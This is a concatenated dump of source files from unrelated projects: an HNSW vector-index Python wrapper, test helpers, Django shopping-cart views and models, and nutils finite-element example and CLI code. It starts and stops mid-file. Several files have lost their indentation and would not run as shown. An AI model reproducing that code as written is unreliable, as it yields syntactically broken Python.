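linecache.clearcache()                  # or discard the whole cache
```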
#### File: hnsw/hnsw/hnsw.py
```python
import sys
import imp
import os
from six import iteritems
from enum import IntEnum
from contextlib import contextmanager
import json
def get_so_paths(dir_name):
dir_name = os.path.join(os.path.dirname(__file__), dir_name)
list_dir = os.listdir(dir_name) if os.path.isdir(dir_name) else []
return [os.path.join(dir_name, so_name) for so_name in list_dir if so_name.split('.')[-1] in ['so', 'pyd']]
def get_hnsw_bin_module():
if '_hnsw' in sys.modules:
return sys.modules['_hnsw']
so_paths = get_so_paths('./')
for so_path in so_paths:
try:
loaded_hnsw = imp.load_dynamic('_hnsw', so_path)
sys.modules['hnsw._hnsw'] = loaded_hnsw
return loaded_hnsw
except ImportError:
pass
from . import _hnsw
return _hnsw
@contextmanager
def log_fixup():
_hnsw._set_logger(sys.stdout)
try:
yield
finally:
_hnsw._reset_logger()
class EDistance(IntEnum):
DotProduct = 0
L1 = 1
L2Sqr = 2
class EVectorComponentType(IntEnum):
Float = 0
I8 = 1
I32 = 2
_hnsw = get_hnsw_bin_module()
HnswException = _hnsw.HnswException
_DenseVectorStorage = {
EVectorComponentType.Float: _hnsw._DenseFloatVectorStorage,
EVectorComponentType.I8: _hnsw._DenseI8VectorStorage,
EVectorComponentType.I32: _hnsw._DenseI32VectorStorage
}
_HnswDenseVectorIndex = {
EVectorComponentType.Float: _hnsw._HnswDenseFloatVectorIndex,
EVectorComponentType.I8: _hnsw._HnswDenseI8VectorIndex,
EVectorComponentType.I32: _hnsw._HnswDenseI32VectorIndex
}
_transform_mobius = {
EVectorComponentType.Float: _hnsw._transform_mobius_float,
EVectorComponentType.I8: _hnsw._transform_mobius_i8,
EVectorComponentType.I32: _hnsw._transform_mobius_i32
}
_OnlineHnswDenseVectorIndex = {
EVectorComponentType.Float: _hnsw._OnlineHnswDenseFloatVectorIndex,
EVectorComponentType.I8: _hnsw._OnlineHnswDenseI8VectorIndex,
EVectorComponentType.I32: _hnsw._OnlineHnswDenseI32VectorIndex,
}
class Pool:
"""
Pool is a storage of vectors
"""
def __init__(self, vectors_path, dtype, dimension, vectors_bin_data=None):
"""
        Pool is a storage of vectors. You can create it from a row-major binary file or
        from in-memory binary data of vectors.
Parameters
----------
vectors_path : string
Path to binary file with vectors.
dtype : EVectorComponentType
Type of vectors.
dimension : int
Dimension of vectors.
vectors_bin_data : bytes
Binary data of vectors.
"""
self.vectors_path = vectors_path
self.dtype = dtype
self.dimension = dimension
assert (vectors_bin_data is None) ^ (vectors_path is None)
if vectors_path is not None:
self._storage = _DenseVectorStorage[dtype](vectors_path, dimension)
self._data = None
if vectors_bin_data is not None:
self._storage = _DenseVectorStorage[dtype](None, dimension, vectors_bin_data)
self._data = vectors_bin_data
@classmethod
def from_file(cls, vectors_path, dtype, dimension):
"""
Create pool from binary file.
Parameters
----------
vectors_path : string
Path to binary file with vectors.
dtype : EVectorComponentType
Type of vectors.
dimension : int
Dimension of vectors.
"""
return Pool(vectors_path, dtype, dimension, None)
@classmethod
def from_bytes(cls, vectors_bin_data, dtype, dimension):
"""
Create pool from binary data.
Parameters
----------
vectors_bin_data : bytes
Binary data of vectors.
dtype : EVectorComponentType
Type of vectors.
dimension : int
Dimension of vectors.
"""
return Pool(None, dtype, dimension, vectors_bin_data)
def get_item(self, id):
"""
Get item from storage by id.
Parameters
----------
id : int
Index of item in storage.
Returns
-------
item : numpy.ndarray
"""
return self._storage._get_item(id)
def get_num_items(self):
"""
Get the number of items in storage.
Returns
-------
num_items : int
"""
return self._storage._get_num_items()
def transform_mobius(pool):
"""
Transform pool for fast dot product search on HNSW graph
https://papers.nips.cc/paper/9032-mobius-transformation-for-fast-inner-product-search-on-graph.pdf
Parameters
----------
pool : Pool
Returns
-------
transformed_pool : Pool
"""
transformed_pool = Pool.from_bytes(bytes(0), EVectorComponentType.Float, pool.dimension)
transformed_pool._storage = _transform_mobius[pool.dtype](pool._storage)
return transformed_pool
class Hnsw:
"""
Class for building, loading and working with Hierarchical Navigable Small World index.
"""
def __init__(self):
"""
Create object for working with HNSW.
"""
self._index = None
self._data = None
def build(self, pool, distance, max_neighbors=None, search_neighborhood_size=None, num_exact_candidates=None,
batch_size=None, upper_level_batch_size=None, level_size_decay=None, num_threads=None, verbose=False,
report_progress=True, snapshot_file=None, snapshot_interval=None):
"""
Build index with given options.
Parameters
----------
pool : Pool
Pool of vectors for which index will be built.
distance : EDistance
Distance that should be used for finding nearest vectors.
max_neighbors : int (default=32)
Maximum number of neighbors that every item can be connected with.
search_neighborhood_size : int (default=300)
Search neighborhood size for ANN-search.
            Higher values improve search quality at the expense of building time.
num_exact_candidates : int (default=100)
Number of nearest vectors to take from batch.
            Higher values improve search quality at the expense of building time.
batch_size : int (default=1000)
            Number of items added to the graph at each step of the algorithm.
upper_level_batch_size : int (default=40000)
Batch size for building upper levels.
level_size_decay : int (default=max_neighbors/2)
Base of exponent for decaying level sizes.
num_threads : int (default=number of CPUs)
Number of threads for building index.
report_progress : bool (default=True)
Print progress of building.
verbose : bool (default=False)
Print additional information about time of building.
snapshot_file : string (default=None)
Path for saving snapshots during the index building.
snapshot_interval : int (default=600)
Interval between saving snapshots (seconds).
            A snapshot is also saved after building each level.
"""
params = {}
not_params = ["not_params", "self", "params", "__class__", "pool", "distance"]
for key, value in iteritems(locals()):
if key not in not_params and value is not None:
params[key] = value
self._index = _HnswDenseVectorIndex[pool.dtype](pool._storage, distance)
with log_fixup():
self._index._build(json.dumps(params))
def _check_index(self):
if self._index is None:
raise HnswException("Index is not built and not loaded")
def save(self, index_path):
"""
Save index to file.
Parameters
----------
index_path : string
Path to file for saving index.
"""
self._check_index()
self._index._save(index_path)
def load(self, index_path, pool, distance):
"""
Load index from file.
Parameters
----------
index_path : string
Path to file for loading index.
pool : Pool
Pool of vectors for which index will be loaded.
distance : EDistance
Distance that should be used for finding nearest vectors.
"""
self._index = _HnswDenseVectorIndex[pool.dtype](pool._storage, distance)
self._index._load(index_path)
self._data = None
def load_from_bytes(self, index_data, pool, distance):
"""
Load index from bytes.
Parameters
----------
index_data : bytes
Index binary data.
pool : Pool
Pool of vectors for which index will be loaded.
distance : EDistance
Distance that should be used for finding nearest vectors.
"""
self._index = _HnswDenseVectorIndex[pool.dtype](pool._storage, distance)
self._index._load_from_bytes(index_data)
self._data = index_data
def get_nearest(self, query, top_size, search_neighborhood_size, distance_calc_limit=0):
"""
Get approximate nearest neighbors for query from index.
Parameters
----------
query : list or numpy.ndarray
Vector for which nearest neighbors should be found.
top_size : int
Required number of neighbors.
search_neighborhood_size : int
Search neighborhood size for ANN-search.
            Higher values improve search quality at the expense of search time.
            It should be equal to or greater than top_size.
distance_calc_limit : int (default=0)
            Limit on the number of distance calculations,
            to guarantee satisfactory search time at the expense of quality.
0 is equivalent to no limit.
Returns
-------
neighbors : list of tuples (id, distance)
"""
self._check_index()
return self._index._get_nearest(query, top_size, search_neighborhood_size, distance_calc_limit)
class HnswEstimator:
"""
    Class for building, loading and working with a Hierarchical Navigable Small World index through a
    scikit-learn Estimator-compatible interface.
    Mostly a drop-in replacement for sklearn.neighbors.NearestNeighbors (except for some parameters).
"""
def __init__(self, n_neighbors=5,
distance=EDistance.DotProduct, max_neighbors=32, search_neighborhood_size=300,
num_exact_candidates=100, batch_size=1000, upper_level_batch_size=40000,
level_size_decay=None):
"""
Parameters
----------
n_neighbors : int, default=5
Number of neighbors to use by default for kneighbors queries.
distance : EDistance
Distance that should be used for finding nearest vectors.
max_neighbors : int (default=32)
Maximum number of neighbors that every item can be connected with.
search_neighborhood_size : int (default=300)
Search neighborhood size for ANN-search.
            Higher values improve search quality at the expense of building time.
num_exact_candidates : int (default=100)
Number of nearest vectors to take from batch.
            Higher values improve search quality at the expense of building time.
batch_size : int (default=1000)
            Number of items added to the graph at each step of the algorithm.
upper_level_batch_size : int (default=40000)
Batch size for building upper levels.
level_size_decay : int (default=max_neighbors/2)
Base of exponent for decaying level sizes.
"""
for key, value in iteritems(locals()):
if key not in ['self', '__class__']:
setattr(self, key, value)
def _check_index(self):
if self._index is None:
raise HnswException("Index is not built and not loaded")
def fit(self, X, y=None, num_threads=None, verbose=False, report_progress=True, snapshot_file=None,
snapshot_interval=600):
"""
Fit the HNSW model.
Parameters
----------
X : array-like of shape (n_samples, n_values)
        y : None
            Ignored; added to be compatible with the Estimator API.
num_threads : int (default=number of CPUs)
Number of threads for building index.
report_progress : bool (default=True)
Print progress of building.
verbose : bool (default=False)
Print additional information about time of building.
snapshot_file : string (default=None)
Path for saving snapshots during the index building.
snapshot_interval : int (default=600)
Interval between saving snapshots (seconds).
Returns
-------
model : HnswEstimator
"""
self._index, self._index_data = _hnsw._init_index(X, self.distance)
params = self._get_params(return_none=False)
not_params = ["not_params", "self", "params", "__class__", "X", "y"]
for key, value in iteritems(locals()):
if key not in not_params and value is not None:
params[key] = value
del params['distance']
with log_fixup():
self._index._build(json.dumps(params))
return self
def _get_params(self, return_none):
params = {}
for key, value in self.__dict__.items():
if key[0] != '_' and (return_none or (value is not None)):
params[key] = value
return params
def get_params(self, deep=True):
"""
Get parameters for this estimator.
"""
return self._get_params(return_none=True)
def set_params(self, **params):
"""
Set the parameters of this estimator.
Parameters
----------
**params : dict
HnswEstimator parameters.
Returns
-------
self : HnswEstimator instance
"""
if not params:
return self
valid_params = self._get_params(return_none=True)
for key, value in params.items():
if key not in valid_params:
                raise HnswException(
                    'Invalid parameter %s for HnswEstimator. '
                    'Check the list of available parameters '
                    'with `get_params().keys()`.' % key
                )
setattr(self, key, value)
return self
@property
def effective_metric_(self):
"""
Returns
-------
Distance that should be used for finding nearest vectors.
"""
return self.distance
@property
def n_samples_fit_(self):
"""
Returns
-------
Number of samples in the fitted data.
"""
self._check_index()
return self._index_data.shape[0]
def kneighbors(self, X=None, n_neighbors=None, return_distance=True, search_neighborhood_size=None,
distance_calc_limit=0):
"""Finds the approximate K-neighbors of a point.
Returns indices of and distances to the neighbors of each point.
Parameters
----------
X : array-like, shape (n_queries, n_features) or None
The query point or points.
If not provided, neighbors of each indexed point are returned.
In this case, the query point is not considered its own neighbor.
n_neighbors : int, default=None
Number of neighbors required for each sample. The default is the
value passed to the constructor.
return_distance : bool, default=True
Whether or not to return the distances.
search_neighborhood_size : int, default=None
Search neighborhood size for ANN-search.
            Higher values improve search quality at the expense of search time.
            It should be equal to or greater than top_size.
            If None, it is set to n_neighbors * 2.
distance_calc_limit : int (default=0)
            Limit on the number of distance calculations,
            to guarantee satisfactory search time at the expense of quality.
0 is equivalent to no limit.
Returns
-------
        neigh_dist : numpy.ndarray of shape (n_queries, n_neighbors)
Array representing the lengths to points, only present if
return_distance=True
neigh_ind : numpy.ndarray of shape (n_queries, n_neighbors)
Indices of the nearest points in the population matrix.
"""
self._check_index()
if X is None:
X = self._index_data
if n_neighbors is None:
n_neighbors = self.n_neighbors
if search_neighborhood_size is None:
search_neighborhood_size = n_neighbors * 2
return self._index._kneighbors(X, n_neighbors, return_distance, self.distance, search_neighborhood_size,
distance_calc_limit)
class OnlineHnsw:
"""
Class for building and working with Online Hierarchical Navigable Small World index.
"""
def __init__(self, dtype, dimension, distance, max_neighbors=None, search_neighborhood_size=None, num_vertices=None, level_size_decay=None):
"""
Create object with given options.
Parameters
----------
dtype : EVectorComponentType
Type of vectors.
dimension : int
Dimension of vectors.
distance : EDistance
Distance that should be used for finding nearest vectors.
max_neighbors : int (default=32)
Maximum number of neighbors that every item can be connected with.
search_neighborhood_size : int (default=300)
Search neighborhood size for ANN-search.
            Higher values improve search quality at the expense of building time.
num_vertices : int (default=0)
Expected number of vectors in storage.
level_size_decay : int (default=max_neighbors/2)
Base of exponent for decaying level sizes.
"""
self.dtype = dtype
self.dimension = dimension
params = {}
all_params = ["max_neighbors", "search_neighborhood_size", "num_vertices", "level_size_decay"]
for key, value in iteritems(locals()):
if key in all_params and value is not None:
params[key] = value
self._online_index = _OnlineHnswDenseVectorIndex[dtype](dimension, distance, json.dumps(params))
def get_nearest_and_add_item(self, query):
"""
Get approximate nearest neighbors for query from index and add item to index
Parameters
----------
query : list or numpy.ndarray
            Vector for which nearest neighbors should be found;
            this vector is then added to the index.
Returns
-------
neighbors : list of tuples (id, distance) with length = search_neighborhood_size
"""
return self._online_index._get_nearest_neighbors_and_add_item(query)
def get_nearest(self, query, top_size=0):
"""
Get approximate nearest neighbors for query from index.
Parameters
----------
query : list or numpy.ndarray
Vector for which nearest neighbors should be found.
top_size : int
Required number of neighbors.
Returns
-------
neighbors : list of tuples (id, distance)
"""
return self._online_index._get_nearest_neighbors(query, top_size)
def add_item(self, item):
"""
        Add an item to the index.
Parameters
----------
item : list or numpy.ndarray
            Vector which should be added to the index.
"""
self._online_index._add_item(item)
def get_item(self, id):
"""
Get item from storage by id.
Parameters
----------
id : int
Index of item in storage.
Returns
-------
item : numpy.ndarray
"""
return self._online_index._get_item(id)
def get_num_items(self):
"""
Get the number of items in storage.
Returns
-------
num_items : int
"""
return self._online_index._get_num_items()
```
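Tying the pieces together, an index is built from a `Pool` and then queried with `get_nearest`. The sketch below follows the docstrings above; the top-level import name `hnsw` and the float32 row-major layout are assumptions, not taken from the sources here.
```python
# Sketch of building and querying an index (import names assumed).
import numpy as np
from hnsw import Pool, Hnsw, EDistance, EVectorComponentType
dim = 16
vectors = np.random.rand(1000, dim).astype(np.float32)   # row-major float32
pool = Pool.from_bytes(vectors.tobytes(), EVectorComponentType.Float, dim)
index = Hnsw()
index.build(pool, EDistance.L2Sqr, max_neighbors=32, search_neighborhood_size=300)
# ten approximate nearest neighbours of the first vector
for item_id, distance in index.get_nearest(vectors[0], top_size=10,
                                            search_neighborhood_size=100):
    print(item_id, distance)
```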
#### File: python/hnsw/setup.py
```python
from setuptools import setup, Extension
from distutils.command.build_ext import build_ext
from distutils.dir_util import mkpath
from distutils.file_util import copy_file
class CopyBuild(build_ext):
def build_extension(self, ext):
mkpath(self.build_lib)
copy_file(ext.sources[0], self.get_ext_fullpath(ext.name))
# How to build and upload package to Yandex PyPI can be found here: https://wiki.yandex-team.ru/pypi/
# Before building and uploading, _hnsw.so should be built from the 'hnsw' folder like this:
# ya make -r -DUSE_ARCADIA_PYTHON=no -DOS_SDK=local -DPYTHON_CONFIG=python2-config
# Run setup.py with the Python whose config you used to build _hnsw.so in the previous step.
setup(
name='hnsw',
version='0.2.1',
description='Python wrapper for Hierarchical Navigable Small World index implementation',
author='<NAME>',
author_email='<EMAIL>',
packages=['hnsw'],
cmdclass={'build_ext': CopyBuild},
ext_modules=[Extension('hnsw/_hnsw', ['hnsw/_hnsw.so'])]
)
```
#### File: runtime_py3/test/test_resources.py
```python
import importlib.resources as ir
import pytest
@pytest.mark.parametrize("package, resource", (
("resources", "foo.txt"),
("resources.submodule", "bar.txt")
))
def test_is_resource_good_path(package, resource):
assert ir.is_resource(package, resource)
@pytest.mark.parametrize("package, resource", (
("resources", "111.txt"),
("resources.submodule", "222.txt")
))
def test_is_resource_missing(package, resource):
assert not ir.is_resource(package, resource)
def test_is_resource_subresource_directory():
# Directories are not resources.
assert not ir.is_resource("resources", "submodule")
@pytest.mark.parametrize("package, resource, expected", (
("resources", "foo.txt", b"bar"),
("resources.submodule", "bar.txt", b"foo")
))
def test_read_binary_good_path(package, resource, expected):
assert ir.read_binary(package, resource) == expected
def test_read_binary_missing():
with pytest.raises(FileNotFoundError):
ir.read_binary("resources", "111.txt")
@pytest.mark.parametrize("package, resource, expected", (
("resources", "foo.txt", "bar"),
("resources.submodule", "bar.txt", "foo")
))
def test_read_text_good_path(package, resource, expected):
assert ir.read_text(package, resource) == expected
def test_read_text_missing():
with pytest.raises(FileNotFoundError):
ir.read_text("resources", "111.txt")
@pytest.mark.parametrize("package, expected", (
("resources", ["submodule", "foo.txt"]),
("resources.submodule", ["bar.txt"])
))
def test_contents_good_path(package, expected):
assert sorted(ir.contents(package)) == sorted(expected)
```
#### File: testing/filter/filter.py
```python
import re
import fnmatch
import logging
logger = logging.getLogger(__name__)
TEST_SUBTEST_SEPARATOR = '::'
PARSE_TAG_RE = re.compile(r"([+-]?[\w:]*)")
class FilterException(Exception):
mute = True
def fix_filter(flt):
if TEST_SUBTEST_SEPARATOR not in flt and "*" not in flt:
# user wants to filter by test module name
flt = flt + TEST_SUBTEST_SEPARATOR + "*"
return flt
def escape_for_fnmatch(s):
    # replace brackets with bracket-free sentinels on both the tested name and
    # the pattern so that fnmatch does not treat them as character classes
    return s.replace("[", "&#91;").replace("]", "&#93;")
def make_py_file_filter(filter_names):
if filter_names is not None:
with_star = []
wo_star = set()
for flt in filter_names:
flt = flt.split(':')[0]
if '*' in flt:
with_star.append(flt.split('*')[0] + '*')
else:
wo_star.add(flt)
def predicate(filename):
if filter_names is None:
return True
return filename in wo_star or any([fnmatch.fnmatch(escape_for_fnmatch(filename), escape_for_fnmatch(filter_name)) for filter_name in with_star])
return predicate
def make_name_filter(filter_names):
    # materialize the iterator: it is consumed both here and inside the predicate
    filter_names = list(map(fix_filter, filter_names))
filter_full_names = set()
for name in filter_names:
if '*' not in name:
filter_full_names.add(name)
def predicate(testname):
return testname in filter_full_names or any([fnmatch.fnmatch(escape_for_fnmatch(testname), escape_for_fnmatch(filter_name)) for filter_name in filter_names])
return predicate
```
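A short sketch of how the two predicate factories are meant to be used (all filter strings below are hypothetical):
```python
# Hypothetical usage of the filter helpers above.
name_filter = make_name_filter(["test_math::test_add", "test_io*"])
print(name_filter("test_math::test_add"))   # True  (exact match)
print(name_filter("test_io::test_read"))    # True  (wildcard match)
print(name_filter("test_net::test_ping"))   # False
file_filter = make_py_file_filter(["test_math", "test_io*"])
print(file_filter("test_math"))             # True
```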
#### File: yatest/common/runtime_java.py
```python
import os
import tarfile
import contextlib
from . import runtime
_JAVA_DIR = []
def get_java_path(jdk_dir):
# deprecated - to be deleted
java_paths = (os.path.join(jdk_dir, 'bin', 'java'), os.path.join(jdk_dir, 'bin', 'java.exe'))
for p in java_paths:
if os.path.exists(p):
return p
for f in os.listdir(jdk_dir):
if f.endswith('.tar'):
with contextlib.closing(tarfile.open(os.path.join(jdk_dir, f))) as tf:
tf.extractall(jdk_dir)
for p in java_paths:
if os.path.exists(p):
return p
return ''
def get_build_java_dir(jdk_dir):
versions = [8, 10, 11, 12, 13, 14, 15, 16, 17]
if not _JAVA_DIR:
for version in versions:
jdk_tar_path = os.path.join(jdk_dir, "jdk{}.tar".format(version))
if os.path.exists(jdk_tar_path):
jdk_dir = runtime.build_path('jdk4test')
with contextlib.closing(tarfile.open(jdk_tar_path)) as tf:
tf.extractall(jdk_dir)
assert os.path.exists(os.path.join(jdk_dir, "bin", "java"))
_JAVA_DIR.append(jdk_dir)
break
else:
_JAVA_DIR.append(None)
return _JAVA_DIR[0]
``` |
{
"source": "JochenFM/art_prints_ms4",
"score": 2
} |
#### File: art_prints_ms4/cart/views.py
```python
from django.shortcuts import render, redirect, HttpResponse, get_object_or_404
from django.contrib import messages
from products.models import Product
# Create your views here.
def view_cart(request):
""" a view to return the cart contents page """
return render(request, 'cart/cart.html')
def add_to_cart(request, item_id):
"""add the specified product to the shopping cart"""
product = get_object_or_404(Product, pk=item_id)
quantity = int(request.POST.get('quantity'))
redirect_url = request.POST.get('redirect_url')
cart = request.session.get('cart', {})
cart[item_id] = quantity
messages.success(request, f'Added {product.name} to your cart')
request.session['cart'] = cart
return redirect(redirect_url)
def remove_from_cart(request, item_id):
"""Remove the item from the shopping cart"""
try:
product = get_object_or_404(Product, pk=item_id)
cart = request.session.get('cart', {})
cart.pop(item_id)
messages.success(request, f'Removed {product.name} from your cart')
request.session['cart'] = cart
return HttpResponse(status=200)
except Exception as e:
messages.error(request, f'Error removing item: {e}')
return HttpResponse(status=500)
```
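These views still need URL wiring; a hypothetical `cart/urls.py` matching the view names above could look like this (paths and URL names are illustrative, not taken from the project):
```python
# Hypothetical cart/urls.py for the views above.
from django.urls import path
from . import views
urlpatterns = [
    path('', views.view_cart, name='view_cart'),
    path('add/<item_id>/', views.add_to_cart, name='add_to_cart'),
    path('remove/<item_id>/', views.remove_from_cart, name='remove_from_cart'),
]
```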
#### File: art_prints_ms4/home/models.py
```python
from django.db import models
class Category(models.Model):
# this name should be readable in other code, can be mono_cards
class Meta:
verbose_name_plural = 'Categories'
name = models.CharField(max_length=254, null=True, blank=True)
# friendly name is for front end, can be Mono Cards
friendly_name = models.CharField(max_length=254, null=True, blank=True)
# string method to return category model
def __str__(self):
return self.name
# model method to return the friendly name if needed
def get_friendly_name(self):
return self.friendly_name
# product model
class Product(models.Model):
category = models.ForeignKey('Category', null=True, blank=True,
on_delete=models.SET_NULL)
name = models.CharField(max_length=254)
author = models.CharField(max_length=254, null=True, blank=True)
description = models.TextField()
price = models.DecimalField(max_digits=6, decimal_places=2)
condition = models.DecimalField(max_digits=1, decimal_places=0, null=True,
blank=True)
dimension = models.CharField(max_length=40, null=True, blank=True)
year = models.DecimalField(max_digits=6, decimal_places=0, null=True,
blank=True)
image_url = models.URLField(max_length=1024, null=True, blank=True)
image = models.ImageField(null=True, blank=True)
def __str__(self):
return self.name
``` |
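A brief, illustrative sketch of querying these models with the Django ORM. Note that `cart/views.py` above imports `Product` from `products.models`, so the app housing the model may differ from this file's `home` path; the category name used here is hypothetical.
```python
# Illustrative ORM queries against the models above (app path assumed).
from home.models import Product
mono_cards = Product.objects.filter(category__name='mono_cards')
cheap_first = Product.objects.filter(price__lte=50).order_by('price')
print(mono_cards.count(), cheap_first.count())
```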
{
"source": "JochenHinz/nutils",
"score": 3
} |
#### File: nutils/examples/laplace.py
```python
import nutils, numpy
# The main function defines the parameter space for the script. Configurable
# parameters are the mesh density (in number of elements along an edge),
# element type (square, triangle, or mixed), type of basis function (std or
# spline, with availability depending on element type), and polynomial degree.
def main(nelems: 'number of elements along edge' = 10,
etype: 'type of elements (square/triangle/mixed)' = 'square',
btype: 'type of basis function (std/spline)' = 'std',
degree: 'polynomial degree' = 1):
# A unit square domain is created by calling the
# :func:`nutils.mesh.unitsquare` mesh generator, with the number of elements
# along an edge as the first argument, and the type of elements ("square",
# "triangle", or "mixed") as the second. The result is a topology object
# ``domain`` and a vector-valued geometry function ``geom``.
domain, geom = nutils.mesh.unitsquare(nelems, etype)
# To be able to write index based tensor contractions, we need to bundle all
# relevant functions together in a namespace. Here we add the geometry ``x``,
# a scalar ``basis``, and the solution ``u``. The latter is formed by
# contracting the basis with a to-be-determined solution vector ``?lhs``.
ns = nutils.function.Namespace()
ns.x = geom
ns.basis = domain.basis(btype, degree=degree)
ns.u = 'basis_n ?lhs_n'
# We are now ready to implement the Laplace equation. In weak form, the
# solution is a scalar field :math:`u` for which:
#
# .. math:: ∀ v: ∫_Ω v_{,k} u_{,k} - ∫_{Γ_n} v f = 0.
#
# By linearity the test function :math:`v` can be replaced by the basis that
# spans its space. The result is an integral ``res`` that evaluates to a
# vector matching the size of the function space.
res = domain.integral('basis_n,i u_,i d:x' @ ns, degree=degree*2)
res -= domain.boundary['right'].integral('basis_n cos(1) cosh(x_1) d:x' @ ns, degree=degree*2)
# The Dirichlet constraints are set by finding the coefficients that minimize
# the error:
#
# .. math:: \min_u ∫_{\Gamma_d} (u - u_d)^2
#
# The resulting ``cons`` array holds numerical values for all the entries of
# ``?lhs`` that contribute (up to ``droptol``) to the minimization problem.
# All remaining entries are set to ``NaN``, signifying that these degrees of
# freedom are unconstrained.
sqr = domain.boundary['left'].integral('u^2 d:x' @ ns, degree=degree*2)
sqr += domain.boundary['top'].integral('(u - cosh(1) sin(x_0))^2 d:x' @ ns, degree=degree*2)
cons = nutils.solver.optimize('lhs', sqr, droptol=1e-15)
# The unconstrained entries of ``?lhs`` are to be determined such that the
# residual vector evaluates to zero in the corresponding entries. This step
# involves a linearization of ``res``, resulting in a jacobian matrix and
# right hand side vector that are subsequently assembled and solved. The
# resulting ``lhs`` array matches ``cons`` in the constrained entries.
lhs = nutils.solver.solve_linear('lhs', res, constrain=cons)
# Once all entries of ``?lhs`` are established, the corresponding solution can
# be visualized by sampling values of ``ns.u`` along with physical
# coordinates ``ns.x``, with the solution vector provided via the
# ``arguments`` dictionary. The sample members ``tri`` and ``hull`` provide
# additional inter-point information required for drawing the mesh and
# element outlines.
bezier = domain.sample('bezier', 9)
x, u = bezier.eval(['x_i', 'u'] @ ns, lhs=lhs)
nutils.export.triplot('solution.png', x, u, tri=bezier.tri, hull=bezier.hull)
# To confirm that our computation is correct, we use our knowledge of the
# analytical solution to evaluate the L2-error of the discrete result.
err = domain.integral('(u - sin(x_0) cosh(x_1))^2 d:x' @ ns, degree=degree*2).eval(lhs=lhs)**.5
nutils.log.user('L2 error: {:.2e}'.format(err))
return cons, lhs, err
# If the script is executed (as opposed to imported), :func:`nutils.cli.run`
# calls the main function with arguments provided from the command line. For
# example, to keep with the default arguments simply run :sh:`python3
# laplace.py`. To select mixed elements and quadratic basis functions add
# :sh:`python3 laplace.py etype=mixed degree=2`.
if __name__ == '__main__':
nutils.cli.run(main)
# Once a simulation is developed and tested, it is good practice to save a few
# strategically chosen return values for routine regression testing. Here we use
# the standard :mod:`unittest` framework, with
# :func:`nutils.numeric.assert_allclose64` facilitating the embedding of
# desired results as compressed base64 data.
class test(nutils.testing.TestCase):
@nutils.testing.requires('matplotlib')
def test_default(self):
cons, lhs, err = main(nelems=4, etype='square', btype='std', degree=1)
nutils.numeric.assert_allclose64(cons, 'eNrbKPv1QZ3ip9sL1BgaILDYFMbaZwZj5ZnDW'
'NfNAeWPESU=')
nutils.numeric.assert_allclose64(lhs, 'eNoBMgDN/7Ed9eB+IfLboCaXNKc01DQaNXM14j'
'XyNR82ZTa+NpI2oTbPNhU3bjf7Ngo3ODd+N9c3SNEU1g==')
numpy.testing.assert_almost_equal(err, 1.63e-3, decimal=5)
@nutils.testing.requires('matplotlib')
def test_spline(self):
cons, lhs, err = main(nelems=4, etype='square', btype='spline', degree=2)
nutils.numeric.assert_allclose64(cons, 'eNqrkmN+sEfhzF0xleRbDA0wKGeCYFuaIdjK5'
'gj2aiT2VXMAJB0VAQ==')
nutils.numeric.assert_allclose64(lhs, 'eNqrkmN+sEfhzF0xleRbrsauxsnGc43fGMuZJJ'
'gmmNaZ7jBlN7M08wLCDLNFZh/NlM0vmV0y+2CmZV5pvtr8j9kfMynzEPPF5lfNAcuhGvs=')
numpy.testing.assert_almost_equal(err, 8.04e-5, decimal=7)
@nutils.testing.requires('matplotlib')
def test_mixed(self):
cons, lhs, err = main(nelems=4, etype='mixed', btype='std', degree=2)
nutils.numeric.assert_allclose64(cons, 'eNorfLZF2ucJQwMC3pR7+QDG9lCquAtj71Rlu'
'8XQIGfC0FBoiqweE1qaMTTsNsOvRtmcoSHbHL+a1UD5q+YAxhcu1g==')
nutils.numeric.assert_allclose64(lhs, 'eNorfLZF2ueJq7GrcYjxDJPpJstNbsq9fOBr3G'
'h8xWS7iYdSxd19xseMP5hImu5UZbv1xljOxM600DTWNN/0k2mC6SPTx6Z1pnNMGc3kzdaaPjRN'
'MbMyEzWzNOsy223mBYRRZpPNJpktMks1azM7Z7bRbIXZabNXZiLmH82UzS3Ns80vmj004za/ZP'
'YHCD+Y8ZlLmVuYq5kHm9eahwDxavPF5lfNAWFyPdk=')
numpy.testing.assert_almost_equal(err, 1.25e-4, decimal=6)
```
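The embedded test class can be driven by the standard `unittest` runner; a small sketch, assuming the script is importable as a module named `laplace` and that `nutils.testing.TestCase` is a `unittest.TestCase` subclass:
```python
# Sketch: run the embedded regression tests programmatically.
import unittest
import laplace   # assumes laplace.py is on the import path
suite = unittest.defaultTestLoader.loadTestsFromModule(laplace)
unittest.TextTestRunner(verbosity=2).run(suite)
```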
#### File: nutils/nutils/cli.py
```python
from . import util, config, long_version, warnings, matrix, cache
import sys, inspect, os, io, time, pdb, signal, subprocess, contextlib, traceback, pathlib, html, treelog as log, stickybar
def _version():
try:
githash = subprocess.check_output(['git', 'rev-parse', '--short', 'HEAD'], universal_newlines=True, stderr=subprocess.DEVNULL, cwd=os.path.dirname(__file__)).strip()
if subprocess.check_output(['git', 'status', '--untracked-files=no', '--porcelain'], stderr=subprocess.DEVNULL, cwd=os.path.dirname(__file__)):
githash += '+'
except:
return long_version
else:
return '{} (git:{})'.format(long_version, githash)
def _mkbox(*lines):
width = max(len(line) for line in lines)
ul, ur, ll, lr, hh, vv = '┌┐└┘─│' if config.richoutput else '++++-|'
return '\n'.join([ul + hh * (width+2) + ur]
+ [vv + (' '+line).ljust(width+2) + vv for line in lines]
+ [ll + hh * (width+2) + lr])
def _sigint_handler(mysignal, frame):
_handler = signal.signal(mysignal, signal.SIG_IGN) # temporarily disable handler
try:
while True:
answer = input('interrupted. quit, continue or start debugger? [q/c/d]')
if answer == 'q':
raise KeyboardInterrupt
if answer == 'c' or answer == 'd':
break
if answer == 'd': # after break, to minimize code after set_trace
print(_mkbox(
'TRACING ACTIVATED. Use the Python debugger',
'to step through the code at source line',
'level, list source code, set breakpoints,',
'and evaluate arbitrary Python code in the',
'context of any stack frame. Type "h" for',
'an overview of commands to get going, or',
'"c" to continue uninterrupted execution.'))
pdb.set_trace()
finally:
signal.signal(mysignal, _handler)
def _hms(dt):
seconds = int(dt)
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
return hours, minutes, seconds
def run(func, *, skip=1, loaduserconfig=True):
'''parse command line arguments and call function'''
configs = []
if loaduserconfig:
home = os.path.expanduser('~')
configs.append(dict(richoutput=sys.stdout.isatty()))
configs.extend(path for path in (os.path.join(home, '.config', 'nutils', 'config'), os.path.join(home, '.nutilsrc')) if os.path.isfile(path))
params = inspect.signature(func).parameters.values()
if '-h' in sys.argv[skip:] or '--help' in sys.argv[skip:]:
print('usage: {} (...)'.format(' '.join(sys.argv[:skip])))
print()
